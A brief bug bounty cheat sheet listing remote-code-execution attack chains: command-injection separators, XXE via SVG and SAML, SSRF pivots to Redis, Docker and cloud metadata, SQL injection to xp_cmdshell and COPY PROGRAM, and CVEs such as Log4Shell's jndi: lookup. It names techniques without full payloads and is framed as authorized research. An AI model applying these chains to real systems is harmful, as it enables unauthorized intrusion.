CMD INJECT    → ; | || & && ` $() → separators → OOB DNS
XXE           → SVG/DOCX/SAML → file:// → SSRF → PHP filter chain
SSRF→RCE      → Redis → Docker API → Kubernetes → Cloud metadata
SQLI→RCE      → MySQL OUTFILE → MSSQL xp_cmdshell → PostgreSQL COPY PROGRAM
KNOWN CVEs    → Log4Shell (jndi:) → Spring4Shell (DataBinder) → React2Shell (Flight deserialization)

Document maintained for educational and ethical bug bounty research purposes only. Always obtain proper written authorization before testing.

"Fantastic RCE and Where to Find Them" — Bug Bounty Research Series